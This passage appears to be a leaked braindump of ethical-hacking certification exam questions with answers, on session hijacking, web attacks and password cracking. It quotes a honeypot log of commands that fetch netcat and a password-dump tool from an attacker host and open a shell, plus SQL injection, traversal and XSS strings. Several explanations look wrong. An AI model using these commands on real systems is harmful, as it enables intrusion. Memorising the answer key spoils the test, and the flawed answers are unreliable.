Bob is going to perform an active session hijack against Certkiller . He has acquired the target that allows session oriented connections (Telnet) and performs sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network.
So, what is Bob most likely to do next?
A. Take over the session.
B. Reverse sequence prediction.
C. Guess the sequence numbers.
D. Take one of the parties' offline.
Answer: C
QUESTION 252:
John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong.
In the context of Session hijacking why would you consider this as a false sense of
Actualtests.com - The Power of Knowing

312-50 security? A. The token based security cannot be easily defeated.
B. The connection can be taken over after authentication.
C. A token is not considered strong authentication.
D. Token security is not widely used in the industry.
Answer: B
Explanation: A token will give you a more secure authentication, but the tokens will not help against attacks that are directed against you after you have been authenticated. QUESTION 253:
What is the key advantage of Session Hijacking?
A. It can be easily done and does not require sophisticated skills.
B. You can take advantage of an authenticated connection.
C. You can successfully predict the sequence number generation.
D. You cannot be traced in case the hijack is detected.
Answer: B
Explanation: As an attacker you don't have to steal an account and password in order to take advantage of an authenticated connection.
QUESTION 254:
What type of cookies can be generated while visiting different web sites on the
Internet?
A. Permanent and long term cookies.
B. Session and permanent cookies.
C. Session and external cookies.
D. Cookies are all the same, there is no such thing as different type of cookies.
Answer: B
Explanation: There are two types of cookies: a permanent cookie that remains on a visitor's computer for a given time and a session cookie the is temporarily saved in the visitor's computer memory during the time that the visitor is using the Web site.
Session cookies disappear when you close your Web browser.
QUESTION 255:

Actualtests.com - The Power of Knowing

312-50
Which is the right sequence of packets sent during the initial TCP three way handshake? A. FIN, FIN-ACK, ACK
B. SYN, URG, ACK
C. SYN, ACK, SYN-ACK
D. SYN, SYN-ACK, ACK
Answer: D
Explanation:
A TCP connection always starts with a request for synchronization, a SYN, the reply to that would be another SYN together with a ACK to acknowledge that the last package was delivered successfully and the last part of the three way handshake should be only an ACK to acknowledge that the SYN reply was recived.
QUESTION 256:
What is Hunt used for?
A. Hunt is used to footprint networks
B. Hunt is used to sniff traffic
C. Hunt is used to hack web servers
D. Hunt is used to intercept traffic i.e. man-in-the-middle traffic
E. Hunt is used for password cracking
Answer: D
Explanation: Hunt can be used to intercept traffic. It is useful with telnet, ftp, and others to grab traffic between two computers or to hijack sessions.
QUESTION 257:
You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250.
Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server?
A. 200-250
B. 121-371
C. 120-321
D. 121-231
E. 120-370

Actualtests.com - The Power of Knowing

312-50
Answer: B
Explanation: Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371
(121+250).
QUESTION 258:
How would you prevent session hijacking attacks?
A. Using biometrics access tokens secures sessions against hijacking
B. Using non-Internet protocols like http secures sessions against hijacking
C. Using hardware-based authentication secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking
Answer: D
Explanation: Protection of a session needs to focus on the unique session identifier because it is the only thing that distinguishes users. If the session ID is compromised, attackers can impersonate other users on the system. The first thing is to ensure that the sequence of identification numbers issued by the session management system is unpredictable; otherwise, it's trivial to hijack another user's session. Having a large number of possible session IDs (meaning that they should be very long) means that there are a lot more permutations for an attacker to try.
QUESTION 259:
Which of the following attacks takes best advantage of an existing authenticated connection A. Spoofing
B. Session Hijacking
C. Password Sniffing
D. Password Guessing
Answer: B
Explanation: Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.
QUESTION 260:
Certkiller is making use of Digest Authentication for her Web site. Why is this
Actualtests.com - The Power of Knowing

312-50 considered to be more secure than Basic authentication?
A. Basic authentication is broken
B. The password is never sent in clear text over the network
C. The password sent in clear text over the network is never reused.
D. It is based on Kerberos authentication protocol
Answer: B
Explanation: Digest access authentication is one of the agreed methods a web page can use to negotiate credentials with a web user (using the HTTP protocol). This method builds upon (and obsoletes) the basic authentication scheme, allowing user identity to be established without having to send a password in plaintext over the network. QUESTION 261:
You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges?
A. Administrator
B. IUSR_COMPUTERNAME
C. LOCAL_SYSTEM
D. Whatever account IIS was installed with
Answer: C
Explanation: If you manage to get the system to start a shell for you, that shell will be running as LOCAL_SYSTEM.
QUESTION 262:
You wish to determine the operating system and type of web server being used. At the same time you wish to arouse no suspicion within the target organization.
While some of the methods listed below work, which holds the least risk of detection? A. Make some phone calls and attempt to retrieve the information using social engineering. B. Use nmap in paranoid mode and scan the web server.
C. Telnet to the web server and issue commands to illicit a response.
D. Use the netcraft web site look for the target organization's web site.

Actualtests.com - The Power of Knowing

312-50
Answer: D
Explanation: Netcraft isproviding research data and analysis on many aspects of the
Internet. Netcraft has explored the Internet since 1995 and is a respected authority on the market share of web servers, operating systems, hosting providers, ISPs, encrypted transactions, electronic commerce, scripting languages and content technologies on the internet.
QUESTION 263:
Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files.
Which of the following tools can be used for that purpose? (Choose the best answer)
A. PERM.exe
B. CACLS.exe
C. CLACS.exe
D. NTPERM.exe
Answer: B
Explanation: Cacls.exe is a Windows NT/2000/XP command-line tool you can use to assign, display, or modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a command-line utility, you can also use it in batch files. QUESTION 264:
Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three)
A. Internet Printing Protocol (IPP) buffer overflow
B. Code Red Worm
C. Indexing services ISAPI extension buffer overflow
D. NeXT buffer overflow
Answer: A, B, C
Explanation: Both the buffer overflow in the Internet Printing Protocol and the
ISAPI extension buffer overflow is explained in Microsoft Security Bulletin
MS01-023. The Code Red worm was a computer worm released on the Internet on
July 13, 2001. It attacked computers running Microsoft's IIS web server.
QUESTION 265:

Actualtests.com - The Power of Knowing

312-50
On a default installation of Microsoft IIS web server, under which privilege does the web server software execute?
A. Everyone
B. Guest
C. System
D. Administrator
Answer: C
Explanation: If not changed during the installation, IIS will execute as Local System with way to high privileges.
QUESTION 266:
You are gathering competitive intelligence on Certkiller .com. You notice that they have jobs listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprint the organization? A. The IP range used by the target network
B. An understanding of the number of employees in the company
C. How strong the corporate security policy is
D. The types of operating systems and applications being used.
Answer: D
Explanation:
From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using.
QUESTION 267:
What are the three phases involved in security testing?
A. Reconnaissance, Conduct, Report
B. Reconnaissance, Scanning, Conclusion
C. Preparation, Conduct, Conclusion
D. Preparation, Conduct, Billing
Answer: C
Explanation:
Preparation phase - A formal contract is executed containing non-disclosure of the client's data and legal protection for the tester. At a minimum, it also lists the IP
Actualtests.com - The Power of Knowing

312-50 addresses to be tested and time to test.
Conduct phase - In this phase the penetration test is executed, with the tester looking for potential vulnerabilities.
Conclusion phase - The results of the evaluation are communicated to the pre-defined organizational contact, and corrective action is advised.
QUESTION 268:
You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website?
A. Through Google searching cached files
B. Through Archive.org
C. Download the website and crawl it
D. Visit customers' and prtners' websites
Answer: B
Explanation: Archive.org mirrors websites and categorizes them by date and month depending on the crawl time. Archive.org dates back to 1996, Google is incorrect because the cache is only as recent as the latest crawl, the cache is over-written on each subsequent crawl. Download the websiteis incorrect because that's the same as what you see online. Visiting customer partners websites is just bogus. The answer is then Firmly,
C, archive.org
QUESTION 269:
You work as security technician at Certkiller .com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation?
A. Use mget to download all pages locally for further inspection.
B. Use wget to download all pages locally for further inspection.
C. Use get* to download all pages locally for further inspection.
D. Use get() to download all pages locally for further inspection.
Answer: B
Explanation:
Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to work there needs to be a space between get and * (ie. get *), get(); is just bogus, that's a C function that's written 100% wrong. mget is a command used from
"within" ftp itself, ruling out
A. Which leaves B use wget, which is designed for
Actualtests.com - The Power of Knowing

312-50 mirroring and download files, especially web pages, if used with the -R option (ie. wget
-R www. Certkiller .com) it could mirror a site, all expect protected portions of course.
Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP andcan be usedto make mirrors of archives and home pages thus enabling work in the background, after having logged off.
QUESTION 270:
000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 ....@....m......
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra
0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges:.bytes..Las
100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified:.Mon,
110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A .19.Jul.1999.07:
120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT..ETag:
130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31 ."08b78d3b9d1be1
140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E :a4a"....
150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ
160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap,.sniff
170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ.
180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20 ...Sniffing.
190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap
1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F ,.sniffer).FAQ....This.docu
1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que
1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap
1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into...comp
1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an
This packet was taken from a packet sniffer that monitors a Web server.
This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte
Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header
Actualtests.com - The Power of Knowing

312-50 ending in two line-feeds (0D 0A 0D 0A) and then the data. By examining the packet identify the name and version of the Web server?
A. Apache 1.2
B. IIS 4.0
C. IIS 5.0
D. Linux WServer 2.3
Answer: B
Explanation:
We see that the server is Microsoft, but the exam designer didn't want to make it easy for you. So what they did is blank out the IIS 4.0. The key is in line "0B0" as you see:
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft
49 is I, so we get II
53 is S, so we get IIS
2F is a space
34 is 4
2E is .
30 is 0
So we get IIS 4.0
The answer is B
If you don't remember the ASCII hex to Character, there are enough characters and numbers already converted. For example, line "050" has STRIDER which is 53 54 52 49
44 45 52 and gives you the conversion for the "I:" and "S" characters (which is "49" and
"53").
QUESTION 271:
This kind of attack will let you assume a users identity at a dynamically generated web page or site:
A. SQL Injection
B. Cross Site Scripting
C. Session Hijacking
D. Zone Transfer
Answer: B
Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include
HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Actualtests.com - The Power of Knowing

312-50
QUESTION 272:
____________ will let you assume a users identity at a dynamically generated web page or site.
A. SQL attack
B. Injection attack
C. Cross site scripting
D. The shell attack
E. Winzapper
Answer: C
Explanation: Cross site scripting is also referred to as XSS or CSS. You must know the user is online and you must scam that user into clicking on a link that you have sent in order for this hack attack to work.
QUESTION 273:
What is Form Scalpel used for?
A. Dissecting HTML Forms
B. Dissecting SQL Forms
C. Analysis of Access Database Forms
D. Troubleshooting Netscape Navigator
E. Quatro Pro Analysis Tool
Answer: A
Explanation: Form Scalpel automatically extracts forms from a given web page and splits up all fields for editing and manipulation.
QUESTION 274:
Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changes?
A. A hidden form field value.
B. A hidden price value.
C. An integer variable.
D. A page cannot be changed locally, as it is served by a web server.
Answer: A
Actualtests.com - The Power of Knowing

312-50

QUESTION 275:
Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63 The request is made up of:
1. %2e%2e%2f%2e%2e%2f%2e%2f% = ../../../
2. %65%74%63 = etc
3. %2f = /
4. %70%61%73%73%77%64 = passwd
How would you protect information systems from these attacks?
A. Configure Web Server to deny requests involving Unicode characters.
B. Create rules in IDS to alert on strange Unicode requests.
C. Use SSL authentication on Web Servers.
D. Enable Active Scripts Detection at the firewall and routers.
Answer: B
Explanation:
This is a typical Unicode attack. By configuring your IDS to trigger on strange
Unicode requests you can protect your web-server from this type of attacks.
QUESTION 276:
An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the price?
A. By using SQL injection
B. By using cross site scripting
C. By changing hidden form values in a local copy of the web page
D. There is no way the attacker could do this without directly compromising either the web server or the database
Answer: C
Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.
QUESTION 277:
Dan is conducting a penetration testing and has found a vulnerability in a Web
Actualtests.com - The Power of Knowing

312-50
Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?
A. Dan cannot spoof his IP address over TCP network
B. The server will send replies back to the spoofed IP address
C. Dan can establish an interactive session only if he uses a NAT
D. The scenario is incorrect as Dan can spoof his IP and get responses
Answer: B
Explanation: Spoofing your IP address is only effective when there is no need to establish a two way connection as all traffic meant to go to the attacker will end up at the place of the spoofed address.
QUESTION 278:
What are the differences between SSL and S-HTTP?
A. SSL operates at the network layer and S-HTTP operates at the application layer
B. SSL operates at the application layer and S-HTTP operates at the network layer
C. SSL operates at the transport layer and S-HTTP operates at the application layer
D. SSL operates at the application layer and S-HTTP operates at the transport layer
Answer: C
Explanation: The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer and mimics the "socket library," while
S-HTTP operates at the application layer. Encryption of the transport layer allows
SSL to be application-independent, while S-HTTP is limited to the specific software implementing it. The protocols adopt different philosophies towards encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.
QUESTION 279:
Kevin sends an email invite to Chris to visit a forum for security professionals.
Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?
A. Phishing
Actualtests.com - The Power of Knowing

312-50
B. Denial of Service
C. Cross Site Scripting
D. Backdoor installation
Answer: C
Explanation: This is a typical Type-1 Cross Site Scripting attack. This kind of cross-site scripting hole is also referred to as a non
-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.
QUESTION 280:
Bill has successfully executed a buffer overflow against a Windows IIS web server.
He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem?
A. You cannot use a buffer overflow to deface a web page
B. There is a problem with the shell and he needs to run the attack again
C. The HTML file has permissions of read only
D. The system is a honeypot
Answer: C
QUESTION 281:
Which of the following statements best describes the term Vulnerability?
A. A weakness or error that can lead to a compromise
B. An agent that has the potential to take advantage of a weakness
C. An action or event that might prejudice security
D. The loss potential of a threat.
Answer: A

Actualtests.com - The Power of Knowing

312-50

Explanation: Vulnerabilities are all weaknesses that can be exploited.
QUESTION 282:
Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always make use of a basic Web
Browser to perform such testing.
Which of the following web browser can adequately fill this purpose?
A. Internet Explorer
B. Mozila
C. Lynx
D. Tiger
Answer: C
Explanation: Lynx is a program used to browse the World Wide Web, which works on simple text terminals, rather than requiring a graphical computer display terminal. QUESTION 283:
Clive has been hired to perform a Black-Box test by one of his clients.
How much information will Clive obtain from the client before commencing his test? A. IP Range, OS, and patches installed.
B. Only the IP address range.
C. Nothing but corporate name.
D. All that is available from the client site.
Answer: C
Explanation: Penetration tests can be conducted in one of two ways: black-box (with no prior knowledge the infrastructure to be tested) or white-box (with complete knowledge of the infrastructure to be tested). As you might expect, there are conflicting opinions about this choice and the value that either approach will bring to a project.
QUESTION 284:
Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of Certkiller , he went through a few scanners that are currently available. Here are the scanners that he uses: Actualtests.com - The Power of Knowing

312-50
1. Axent's NetRecon (http://www.axent.com)
2. SARA, by Advanced Research Organization (http://www-arc.com/sara)
3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/)
However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob.
What would be the best method to accurately identify the services running on a victim host?
A. Using Cheops-ng to identify the devices of Certkiller .
B. Using the manual method of telnet to each of the open ports of Certkiller .
C. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for Certkiller .
D. Using the default port and OS to make a best guess of what services are running on each port for Certkiller .
Answer: B
Explanation: By running a telnet connection to the open ports you will receive banners that tells you what service is answering on that specific port.
QUESTION 285:
Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems?
A. Security scanners can't perform vulnerability linkage
B. Security Scanners are not designed to do testing through a firewall
C. Security Scanners are only as smart as their database and can't find unpublished vulnerabilities D. All of the above
Answer: D
Explanation: Security scanners are designed to find vulnerabilities but not to use them, also they will only find well known vulnerabilities that and no zero day exploits. Therefore you can't use a security scanner for penetration testing but need a more powerful program.
QUESTION 286:
You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible
Actualtests.com - The Power of Knowing

312-50 threats coming from inside the site, specifically from employees belonging to different
Departments. What kind of assessment will you be performing ?
A. Black box testing
B. Black hat testing
C. Gray box testing
D. Gray hat testing
E. White box testing
F. White hat testing
Answer: C
Internal Testing is also referred to as Gray-box testing.
QUESTION 287:
What does black box testing mean?
A. You have full knowledge of the environment
B. You have no knowledge of the environment
C. You have partial knowledge of the environment
Answer: B
Explanation:
Black box testing is conducted when you have no knowledge of the environment. It is more time consuming and expensive.
QUESTION 288:
Bryannotices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to johndoe@gmail.com". What do you think has occurred?
A. The web application picked up a record at random
B. The web application returned the first record it found
C. The server error has caused the application to malfunction
D. The web application emailed the administrator about the error
Answer: B
Explanation: The web application sends a query to an SQL database and by giving it the criteria 1=1, which always will be true, it will return the first value it finds.
QUESTION 289:
Bret is a web application administrator and has just read that there are a number of
Actualtests.com - The Power of Knowing

312-50 surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet.
He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out any vulnerabilities.
What are some common vulnerabilities in web applications that he should be concerned about?
A. Non-validated parameters, broken access control, broken account and session management, cross-side scripting and buffer overflows are just a few common vulnerabilities B. No IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visible clear text passwords are just a few common vulnerabilities C. Visible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters set and no SSL configured are just a few common vulnerabilities D. No SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentive system administrator are just a few common vulnerabilities
Answer: A
QUESTION 290:
Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email liza@yahoo.com'. The application displays server error. What is wrong with the web application?
A. The email is not valid
B. User input is not sanitized
C. The web server may be down
D. The ISP connection is not reliable
Answer: B
Explanation: All input from web browsers, such as user data from HTML forms and cookies, must be stripped of special characters and HTML tags as described in the following CERT advisories: http://www.cert.org/advisories/CA-1997-25.html http://www.cert.org/advisories/CA-2000-02.html
QUESTION 291:

Actualtests.com - The Power of Knowing

312-50
While testing web applications, you attempt to insert the following test script into the search area on the company's web site: alert('Testing Testing Testing')
Afterwards, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here?
A. A hybrid attack
B. A buffer overflow
C. Password attacks
D. Cross Site Scripting
Answer: D
Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include
HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
QUESTION 292:
Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to?
A. Cross Site Scripting
B. SQL injection Attack
C. Format String Attack
D. Unicode Traversal Attack
Answer: C
Explanation: Format stringattacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .

Actualtests.com - The Power of Knowing

312-50
QUESTION 293:
Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? A. An integer variable
B. A 'hidden' price value
C. A 'hidden' form field value
D. A page cannot be changed locally; it can only be served by a web server
Answer: C
Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.
QUESTION 294:
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
What attack is being depicted here?
A. Cookie Stealing
B. Session Hijacking
C. Cross Site Scripting
D. Parameter Manipulation
Answer: D
Explanation: Cookies are the preferred method to maintain state in the stateless
HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.
QUESTION 295:
_____ ensures that the enforcement of organizational security policy does not rely
Actualtests.com - The Power of Knowing

312-50 on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at.
A. Mandatory Access Control
B. Authorized Access Control
C. Role-based Access Control
D. Discretionary Access Control
Answer: A
Explanation : In computer security, mandatory access control (MAC) is a kind of access control, defined by the TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity." QUESTION 296:
Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer.
A. archive.org
B. There is no way to get the changed webpage unless you contact someone at the company C. Usenet
D. Javascript would not be in their html so a service like usenet or archive wouldn't help you Answer: A
Explanations:
Archive.org is a website that periodically archives internet content. They have archives of websites over many years. It could be used to go back and look at the javascript as javascript would be in the HTML code.
QUESTION 297:
Which of the following is the best way an attacker can passively learn about technologies used in an organization?
A. By sending web bugs to key personnel
B. By webcrawling the organization web site
C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
Actualtests.com - The Power of Knowing

312-50
D. By performing a port scan on the organization's web site
Answer: C
Note: Sending web bugs, webcrawling their site and port scanning are considered
"active" attacks, the question asks "passive"
QUESTION 298:
You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A
Explanation: A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. As long as you use a word found in or similar to a word found in a dictionary the password is considered to be weak.
QUESTION 299:
Which of the following is most effective against passwords ?
Select the
Answer:
A. Dictionary Attack
B. BruteForce attack
C. Targeted Attack
D. Manual password Attack
Answer: B
Explanation:
The most effective means of password attack is brute force, in a brute force attack the program will attempt to use every possible combination of characters. While this takes longer then a dictionary attack, which uses a text file of real words, it is always capable of breaking the password.
QUESTION 300:
The following excerpt is taken from a honeypot log that was hosted at
Actualtests.com - The Power of Knowing

312-50 lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file
Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands
(such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 e-cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system - johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. Answer: C
QUESTION 301:
Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu.
The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.
John Stevens was in charge of information security at Bank of Timbuktu.After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many bank's customers has been changed! However, money hadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: John
Attempted login of unknown user: sysaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete '';
Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '; drop table logins-Login of user jason, sessionID= 0x75627578626F6F6B
Actualtests.com - The Power of Knowing

312-50
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x90627579944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer)
A. The Hacker attempted SQL Injection technique to gain access to a valid bank login
ID.
